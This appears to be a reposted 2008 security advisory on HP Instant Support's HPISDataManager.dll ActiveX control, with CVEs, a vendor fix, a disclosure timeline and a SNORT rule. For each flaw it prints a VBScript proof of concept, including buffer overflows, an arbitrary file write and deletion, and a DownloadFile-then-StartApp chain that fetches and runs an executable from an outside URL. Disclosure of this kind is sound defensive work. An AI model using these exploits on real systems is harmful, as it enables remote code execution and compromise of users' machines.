|
|
|
|
| |
Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
|
| |
Vulnerable Systems:
* HPISDataManager.dll version 1.0.0.21
Hewlett-Packard Online Support Services is a suite of Web-based tools which automates troubleshooting and diagnosis of hardware and configuration issues. It automatically gathers system data and provides online solutions, including applicable BIOS- and driver updates.
Download ActiveX URL:
http://h20278.www2.hp.com/HPISWeb/Customer/cabs/HPISDataManager.CAB
Support page from where the ActiveX is installed:
http://instantsupport.hp.com/euserv/jsp/hpinstantsupport.jsp
AppendStringToFile - Write file anywhere
The "AppendStringToFile" function in the activeX allows a malicious attacker to write a file with arbitrary data anywhere on the system where the user has the appropriate system rights. This would allow complete compromise of the system and could be used in a drive-by scenario.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As
String )"
memberName = "AppendStringToFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 2
arg1="c:\evil.exe"
arg2=String("CSIS entered this")
target.AppendStringToFile arg1 ,arg2
</script></job></package>
CVE Information:
CVE-2008-0952
ExtractCab - Buffer Overflow
The "ExtractCab" function does not handle input correctly. This would allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the same rights as the logged on user. This issue could also lead to system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String"
memberName = "ExtractCab"
progid = "HPISDataManagerLib.Datamgr"
argCount = 2
arg1=String(277, "B")
arg2="defaultV"
target.ExtractCab arg1 ,arg2
</script></job></package>
CVE Information:
CVE-2007-5604
GetFileTime - Buffer Overflow
The "GetFileTime" function does not correctly handle input. This will allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the same rights as the logged on user. Again this would allow complete system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function GetFileTime ( ByVal FileName As String ) As String"
memberName = "GetFileTime"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1=String(1557, "B")
target.GetFileTime arg1
</script></job></package>
CVE Information:
CVE-2007-5605
MoveFile - Buffer Overflow
The "MoveFile" function does not handle input correctly. This would allow a malicious user to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the rights of the logged on user. Yet again, exploitation could lead to complete system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub MoveFile ( ByVal FileName As String )"
memberName = "MoveFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1 = String(139, "B")
arg1 = "CCCC"
arg1 = arg1 + String(138, "B")
target.MoveFile arg1
</script></job></package>
CVE Information:
CVE-2007-5606
RegistryString - Buffer Overflow
The "RegistryString" function does not handle input correctly. This would allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the rights of the logged on user.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long )
As String"
memberName = "RegistryString"
progid = "HPISDataManagerLib.Datamgr"
argCount = 3
arg1=String(2068, "B")
arg2=1
arg3="defaultV"
target.RegistryString(arg1 ,arg2 ) = arg3
</script></job></package>
CVE Information:
CVE-2007-5607
DownloadFile - Download arbitrary file
The "DownloadFile" function does not handle input correctly. This allows for a malicious person to force a download of any file to the system, where the ActiveX component is installed. In an attack scenario this could give an attacker access to sensitive client data.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub DownloadFile ( ByVal bstrURL As String , ByVal bstrOutputFile As String , ByVal
bstrErrorOutputFile As String )"
memberName = "DownloadFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 3
arg1="http://www.csis.dk/evilfile.exe"
arg2="c:\evilfile.exe"
arg3="c:\log.xml"
target.DownloadFile arg1 ,arg2 ,arg3
</script></job></package>
CVE Information:
CVE-2007-5608
StartApp - Execute arbitrary file on local system
The "StartApp" function does not handle input correctly, which would allow a malicious person to execute arbitrary code, eg. the file downloaded with the functionality within "DownloadFile".
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function StartApp ( ByVal appName As String ) As String"
memberName = "StartApp"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1="c:\evilfile.exe"
target.StartApp arg1
</script></job></package>
CVE Information:
CVE-2008-0953
DeleteSingleFile - Execute arbitrary file on local system
The "DeleteSingleFile" function does not handle input correctly. A malicious attacker would be able to delete files on the system.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub DeleteSingleFile ( ByVal pszFileName As String )"
memberName = "DeleteSingleFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1="c:\evil.exe"
target.DeleteSingleFile arg1
</script></job></package>
CVE Information:
CVE-2007-5610
Workaround:
The following SNORT signature can be used to detect usage or active exploitation of the affected vulnerable ActiveX components.
alert tcp any any -> $HOME_NET any (msg:"CSIS Security Group - Research & Intelligence #0003";
flow:established,to_client; content:"clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC"; nocase;
reference:url,www.csis.dk; classtype:string-detect; sid:900000001; rev:1;)
Fix:
HP has released the following:
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01422264
Version: 1
HPSBMA02326 SSRT071490 rev.1 - HP Instant Support HPISDataManager.dll
Running on Windows, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as
possible.
Release Date: 2008-06-02
Last Updated: 2008-06-02
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
Timeline of public disclosure:
01. November 2007 Vulnerability discovered.
07. November 2007 Research ended.
10. November 2007 CERT/CC informed
11. November 2007 Received CVE/VU tags from CERT/CC
11. November 2007 Vendor notified (security-alert@hp.com)
13. March 2008 Vendor notified that a patch was almost ready.
10. April 2008 Requested update from vendor
08. May 2008 Requested update from vendor
08. May 2008 Received response from vendor that a patch was almost ready.
20. May 2008 Informed vendor that if no response was made the Advisory would be made public 22. May 2008.
21. May 2008 Received information from vendor if release date could be postponed to 26. May 2008.
04. June 2008 Public release
|
|
|
|
|
